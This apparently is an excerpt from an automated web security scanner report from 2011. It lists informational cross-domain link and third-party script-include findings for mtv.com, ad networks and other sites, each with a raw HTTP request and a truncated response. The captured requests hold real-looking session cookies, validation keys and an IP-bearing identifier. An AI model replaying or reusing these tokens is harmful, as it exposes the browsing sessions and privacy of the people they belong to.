<a href="http://www.socialproject.com/PrivacyPolicy.html">Social Project Privacy Policy</a>
...[SNIP]...
<li>
<a href="http://www.socialproject.com/TermsOfUse.html">Social Project Terms Of Use</a>
...[SNIP]...
<li>
<a href="http://www.mtvnetworkscareers.com/">MTV Jobs</a>
</li>
<li>
<a href="http://adspecs.mtvn.com/site/spec/my/mtv.html">Advertising Opportunities</a>
...[SNIP]...
<li>
<a href="http://offer.rhapsody.com/?footer">Rhapsody</a>
</li>
<li>
<a href="http://eventful.com">Eventful</a>
...[SNIP]...
<li>
<a href="http://www.vh1.com/artists/az/adele/artist.jhtml">Adele</a>
...[SNIP]...
<li>
<a href="http://www.cmt.com/artists/az/paisley_brad/artist.jhtml">Brad Paisley</a>
...[SNIP]...
<li>
<a href="http://www.cmt.com/video/music-videos">Country Music Videos</a>
...[SNIP]...
<li>
<a href="http://www.vh1.com/video/music.jhtml">Free Music Videos</a>
...[SNIP]...
<li>
<a href="http://www.cmt.com/artists/az/johnson_jamey/artist.jhtml">Jamey Johnson</a>
...[SNIP]...
<li>
<a href="http://www.cmt.com/artists/az/lady_antebellum/artist.jhtml">Lady Antebellum</a>
...[SNIP]...
<li>
<a href="http://www.cmt.com/artists/az/sugarland/artist.jhtml">Sugarland</a>
...[SNIP]...
<li>
<a href="http://www.cmt.com/artists/az/swift__taylor/artist.jhtml">Taylor Swift</a>
...[SNIP]...
<li>
<a href="http://www.vh1.com/shows/audrina_patridge/series.jhtml">Audrina Patridge</a>
...[SNIP]...
<li>
<a href="http://www.vh1.com/shows/celebrity_rehab_with_dr_drew/season_4/cast_member.jhtml?personalityId=14558">Dr. Drew Pinsky</a>
...[SNIP]...
<li>
<a href="http://www.vh1.com/video/full_episodes.jhtml">Full Episodes</a>
...[SNIP]...
<li>
<a href="http://www.afterellen.com/">Lesbian TV</a>
...[SNIP]...
<li>
<a href="http://www.365gay.com/">Gay News</a>
...[SNIP]...
<li>
<a href="http://www.thefablife.com/">Celebrity Gossip</a>
...[SNIP]...
<li>
<a href="http://www.shockwave.com">Free Online Games</a>
...[SNIP]...
<li>
<a href="http://www.addictinggames.com">Games</a>
</li>
<li>
<a href="http://www.tripoutgaytravel.com/">Gay Travel</a>
...[SNIP]...
<li>
<a href="http://www.LogoTV.com/">Gay Video</a>
...[SNIP]...
<li>
<a href="http://www.thefablife.com/tag/kristen-stewart-photos">Kristen Stewart Photos</a>
...[SNIP]...
<li>
<a href="http://www.thefablife.com/tag/lady-gaga-outfits/">Lady Gaga Outfits</a>
...[SNIP]...
<li>
<a href="http://www.nextmovie.com/">NextMovie</a>
...[SNIP]...
<li>
<a href="http://www.afterelton.com/">Gay Movies</a>
...[SNIP]...
<div id="gft-adChoicesLogo">
<a href="http://srp.mtvn.com/sitefaq.html">
<img width="15" height="16" border="0" alt="Ad icon"
src="http://www.mtv.com/sitewide/images/charlie/ADicon_MTV.png"/>
...[SNIP]...
<div id="gft-adChoicesCopy">
<a href="http://srp.mtvn.com/sitefaq.html">Ad Choices</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1052525703/?label=zh_FCJeHogEQh4nx9QM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...
18.64. http://www.mtv.com/videos/lite/desktop/js/lib.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /videos/lite/desktop/js/lib.jhtml

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /videos/lite/desktop/js/lib.jhtml?v=3i HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012472|check#true#1308010670; __cs_rr=1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_ppv=34

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: 33c455f72a75ec5d74989ffdc4e9a8a
Last-Modified: Mon, 13 Jun 2011 23:57:57 GMT
Content-Type: application/x-javascript
Content-Length: 475145
Cache-Control: max-age=587
Date: Tue, 14 Jun 2011 00:17:46 GMT
Connection: close
Vary: Accept-Encoding

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizzle.js
*
...[SNIP]...
<p><a href="http://www.adobe.com/go/getflashplayer">Download the free Flash Player now!</a><br/><a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /> </a>
...[SNIP]...
18.65. http://www.mtv.com/xd_flux.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /xd_flux.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /xd_flux.html?callbackName=F13080112111260&args=setheight:453 HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270; s_ppv=65

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Mon, 08 Feb 2010 20:27:03 GMT
ETag: "4011b79-17d-47f1c9fc2d3c0"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 381
Cache-Control: max-age=1800
Date: Tue, 14 Jun 2011 00:27:08 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Cross-Domain F
...[SNIP]...
<body>
<script src="http://static0.fluxstatic.com/-/Clients/Common/JS/Common/xd_flux.js" type="text/javascript"></script>
...[SNIP]...
19. Cross-domain script include  previous  next
There are 43 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

19.1. http://ad.doubleclick.net/adi/N1558.66.ALEXAINTERNET/B4971267  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1558.66.ALEXAINTERNET/B4971267

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N1558.66.ALEXAINTERNET/B4971267;sz=300x250;click=http://yads.zedo.com/ads2/c?a%3D959680%3Bx%3D2304%3Bg%3D172%3Bc%3D1219000019%2C1219000019%3Bi%3D0%3Bn%3D1219%3Bi%3D0%3Bu%3DlYrOTcGt89Yz1ao6zwEmLiof%7E051411%3B1%3D8%3B2%3D1%3Be%3Di%3Bs%3D1%3Bg%3D172%3Bw%3D51%3Bm%3D34%3Bq%3DALEXA_core%3Bz%3D0.7181504438631237%3Bk%3D;ord=0.5026219566352665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1219;c=19/1;w=300;h=250;d=9;s=1;q=ALEXA_core
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6780
Date: Tue, 14 Jun 2011 00:29:16 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Dec 29 10:23:26 EST 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
19.2. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5155.152847.2342166290621/B5116932.9

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N5155.152847.2342166290621/B5116932.9;sz=728x90;ord=156694210?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000040d0000000000000000/acc_random=379297/site=mtv.mtvi/aamsz=728x90/relocate=http://clk.atdmt.com/goiframe/200193601.202770770/mtvnsdrv0010001173apm/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6397
Date: Tue, 14 Jun 2011 00:16:06 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri May 20 17:54:51 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
19.3. http://ad.doubleclick.net/adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!category=video;video_id=659420;partner=mv;content_id=1518072;pos=atf;tag=adi;mtype=standard;sz=728x90;tile=2;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;!category=mv;!category=partner;u=franchise-MTVMusicVideoPicksonOverdrive%7Cfranchise-MTVMusicVideoPicksonOverdrive%7Cartist-Mike_Taylor%7Cartist-Mike_Taylor%7C!category-expand%7C!category-float%7C!category-pop%7C!category-video%7Cvideo_id-659420%7Cpartner-mv%7Ccontent_id-1518072%7Cpos-atf%7Ctag-adi%7Cmtype-standard%7Csz-728x90%7Ctile-2%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7C!category-mv%7C!category-partner;ord=942670129658654300? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 328
Date: Tue, 14 Jun 2011 00:17:53 GMT
Expires: Tue, 14 Jun 2011 00:22:53 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <title>Advertisement</title></head><body marginheight=0 marginwidth=0 leftmargin=0 topmargin=0><SCRIPT SRC="http://viacom.adbureau.net/jserver/acc_random=3376896/site=mtv.mtvi/aamsz=728x90"></SCRIPT>
...[SNIP]...
19.4. http://ad.doubleclick.net/adi/mtv.mtvi/survey  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/survey

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/music/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 293
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 14 Jun 2011 00:17:17 GMT
Expires: Tue, 14 Jun 2011 00:22:17 GMT
Discarded: true

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <title>Advertisement</title></head><body marginheight=0 marginwidth=0 leftmargin=0 topmargin=0><script src="http://ar.voicefive.com/bmx3/node.pli?pub=mtv"></script>
...[SNIP]...
19.5. http://ad.doubleclick.net/adi/mtv.mtvi/survey  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/survey

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/mtv.mtvi/survey;sec0=games;sec1=arcade;sec2=;node=survey;sz=1x2;ord=798176392447203500? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 324
Date: Tue, 14 Jun 2011 00:19:16 GMT
Expires: Tue, 14 Jun 2011 00:24:16 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <title>Advertisement</title></head><body marginheight=0 marginwidth=0 leftmargin=0 to
...[SNIP]...
<!-- Adid 206092384-->
<script src="http://content.dl-rms.com/rms/mother/522/nodetag.js"></script>
...[SNIP]...
19.6. http://chartupload.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://chartupload.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: chartupload.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 08:01:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 7741
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-us" xml:lang="en
...[SNIP]...
</a>
       <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a9728942b1daf7e"></script>
...[SNIP]...
19.7. http://chartupload.com/gallery.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://chartupload.com
Path:   /gallery.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /gallery.php HTTP/1.1
Host: chartupload.com
Proxy-Connection: keep-alive
Referer: http://chartupload.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 08:02:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 19536
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-us" xml:lang="en
...[SNIP]...
</a>
       <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a9728942b1daf7e"></script>
...[SNIP]...
19.8. http://community.mtv.com/Overlays/LogIn.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.mtv.com
Path:   /Overlays/LogIn.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com HTTP/1.1
Host: community.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270; s_ppv=65

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Server: w02w
App: ww
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
Cteonnt-Length: 23669
Content-Length: 23669
Date: Tue, 14 Jun 2011 00:27:49 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: IsMasterAuthResponse=false; expires=Mon, 25-Aug-2008 19:01:02 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>


<script src="http://t.flux.com/Clients/JS/FT.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://static0.fluxstatic.com/-/Clients/Common/JS/Common/Prototype.js?77125b10" type="text/javascript"></script>
<script src="http://static2.fluxstatic.com/-/Clients/Common/JS/Common/prototype.box.js?772645fd" type="text/javascript"></script>
<script src="http://static0.fluxstatic.com/-/Clients/Common/JS/Common/WebControl.js?772b0733" type="text/javascript"></script>
<script src="http://static2.fluxstatic.com/-/Clients/Common/JS/Common/AjaxBaseControl.js?772b0733" type="text/javascript"></script>
<script src="http://static3.fluxstatic.com/-/Clients/Common/JS/Common/AjaxBasePage.js?772999d2" type="text/javascript"></script>
<script src="http://static0.fluxstatic.com/-/Clients/Common/JS/Controls/ButtonControl.js?7622b7ab" type="text/javascript"></script>
<script src="http://static3.fluxstatic.com/-/Clients/Common/JS/Controls/PrefilledTextBox.js?761f2727" type="text/javascript"></script>
<script src="http://connect.facebook.net/en_US/all.js" type="text/javascript"></script>
<script src="http://static0.fluxstatic.com/-/Clients/Common/JS/Common/Overlay.js?7724a69c" type="text/javascript"></script>
<script src="http://static3.fluxstatic.com/-/Clients/Common/JS/Common/RoadBlocker.js?7724a69c" type="text/javascript"></script>
<script src="http://static2.fluxstatic.com/-/Clients/Common/JS/Common/ContentJumpOverlay.js?77125b10" type="text/javascript"></script>
<script src="http://static2.fluxstatic.com/-/Clients/Common/JS/Common/IFrameResizer.js?77125b10" type="text/javascript"></script>
<script src="http://static1.fluxstatic.com/-/Clients/Common/JS/Controls/OverlayPanel.js?7636d0b0" type="text/javascript"></script>
<script src="http://static2.fluxstatic.com/-/Clients/Common/JS/Controls/ValidationManager.js?7622b7ab" type="text/javascript"></script>
<script src="http://static1.fluxstatic.com/-/Clients/Common/JS/Common/GoogleTracker.js?772645fd" type="text/javascript"></script>
...[SNIP]...
</script>


   <script src="http://widgetsak.flux.com/Runtime.js" type="text/javascript"></script>
   <script src="http://widgetsak.flux.com/Context.js?communityUcid=D3FCFFFF0002D51D0002FFFFFCD3" type="text/javascript"></script>
   
   <script src="http://widgets3.flux.com/Loader" type="text/javascript" id="D3FCFFFF0002D51D0002FFFFFCD3"></script>
...[SNIP]...
19.9. http://d3.zedo.com//ads3/k/1219/959680/2317/1000002/i.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   //ads3/k/1219/959680/2317/1000002/i.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET //ads3/k/1219/959680/2317/1000002/i.js HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1219;c=19/1;w=300;h=250;d=9;s=1;q=ALEXA_core
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; __qca=P0-1637156077-1305746709690; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; ZCBC=1; ZFFAbh=879B826,20|120_879#365; FFgeo=2241452; FFCap=1595B305,201787:933,196008,139660:1219,217400|0,13,1:0,30,1:0,30,1:0,30,1; ZEDOIDX=13; FFcat=1219,19,9:1219,15,7:1219,17,14:1219,48,15:826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14; FFad=0:0:0:0:2:2:1:0:0; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819:1219,17#736041,15#736039|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1:0,30,1:0,30,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
Content-Length: 1934
Cache-Control: max-age=1493801
Expires: Fri, 01 Jul 2011 07:25:02 GMT
Date: Tue, 14 Jun 2011 00:28:21 GMT
Connection: close


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
e
...[SNIP]...
e(ainfo) + '%3Bk%3D' + zzIdxTrd + ';ord='+Math.random()+'?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>');
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N1558.66.ALEXAINTERNET/B4971267;abr=!ie;sz=300x250;click=http://yads.zedo.com/ads2/c?' + escape(zzLPixie) + escape(zzStr) + escape(zzIdxNw) + escape(zzIdxCh)+ escape(zzIdxPub)+ escape(zzIdxPos)+ escape(zzIdxClk) + escape(ainfo) + '%3Bk%3D' + zzIdxTrd + ';ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...
19.10. http://en.gravatar.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.gravatar.com
Path:   /

Issue detail

